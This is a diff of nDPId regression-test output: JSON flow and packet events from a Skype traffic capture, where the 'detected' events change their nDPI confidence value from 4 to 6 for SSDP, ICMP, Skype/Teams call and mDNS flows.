00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1431969712913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChlVQAAAERcjPAqAEi7\/\/\/+sFNB2wAjXH\/TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1617,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1431969712913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgzegAAAEROaDAqAEi7\/\/\/+sFNB2wAjNfyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1431969712913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChxxoAAAERQG3AqAEi7\/\/\/+sd6B2wAjWvSTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1619,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1431969712913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgMZsAAAER1e3AqAEi7\/\/\/+sd6B2wAjNHFTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1620,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54067,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1620,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1431969712913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969712913,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoiaEAAEARbbDAqAEiwKgBAdMzFOcAFCBsAAEAADLdMt0AAA4Q"} 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1431969712918,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969712918,"pkt":"PBXCt3IO0NQSxnP1CABFwABEBYEAAEAB8QTAqAEBwKgBIgMDgJYAAAAARQAAKImhAABAEW2wwKgBIsCoAQHTMxTnABQgbAABAAAy3TLdAAAOEA=="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.041447} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.041447} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712931,"flow_last_seen":1431969712931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969712931,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1431969712931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969712931,"pkt":"0NQSxnP1PBXCt3IOCABFAABAK1RAAEAGGV7AqAEiW77YfcO9MD57jsMsAAAAALAC\/\/8yeAAAAgQFtAEDAwUBAQgKPiOdpAAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1624,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1431969712980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969712980,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0xLRAAPUGywBbvth9wKgBIjA+w71YjgIOe47DLYASH\/7LvwAAAgQFoAEDAwQBAQQC"} @@ -827,28 +827,28 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":1431969713779,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969713779,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoL3hAAEAGFVLAqAEiW77YfcO+MD4D6993vOs\/Q1AQIADGPwAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuRSsAAEARjAjAqAEisBo3pzLd+R0AGvy6nPQCqlUgKb9nOC7NdHVpaZsV"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuxDQAAEAR2PrAqAEiTLnPDDLdsbUAGvt+nPYC2PYYRrvqRJzYx\/ENvQip"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAu9OEAAEARrrjAqAEisGFk+TLdaAsAGvRlnPgCVJNAf7hukPL\/wXB1U06s"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuQzIAAEARLjDAqAEiRz4AVTLdg28AGnA0nPoCdLBbJLLwvfiy++3Nr6hQ"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713814,"flow_last_seen":1431969713814,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713814,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1431969713814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1431969713814,"pkt":"PBXCt3IOxCwDBkn+CABFAADBLbUAAP8R6nbAqAFc4AAA+xTpFOkArSlHAAAAAAAEAAMAAAAAC19hZnBvdmVydGNwBF90Y3AFbG9jYWwAAAyAAQRfc21iwBgADIABBF9yZmLAGAAMgAEGX2FkaXNrwBgADIABwAwADAABAAAPvAAWE0x1Y2HigJlzIE1hY0Jvb2tQcm\/ADMAMAAwAAQAADA4AEA1MdWNh4oCZcyBpTWFjwAzAKAAMAAEAAAwOABANTHVjYeKAmXMgaU1hY8Ao"} -00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713814,"flow_last_seen":1431969713814,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713814,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}} +00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713814,"flow_last_seen":1431969713814,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713814,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713815,"flow_last_seen":1431969713815,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713815,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1431969713815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":227,"pkt_l4_len":173,"thread_ts_msec":1431969713815,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NAK0R\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QCtu5cAAAAAAAQAAwAAAAALX2FmcG92ZXJ0Y3AEX3RjcAVsb2NhbAAADIABBF9zbWLAGAAMgAEEX3JmYsAYAAyAAQZfYWRpc2vAGAAMgAHADAAMAAEAAA+8ABYTTHVjYeKAmXMgTWFjQm9va1Byb8AMwAwADAABAAAMDgAQDUx1Y2HigJlzIGlNYWPADMAoAAwAAQAADA4AEA1MdWNh4oCZcyBpTWFjwCg="} -00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713815,"flow_last_seen":1431969713815,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713815,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}} 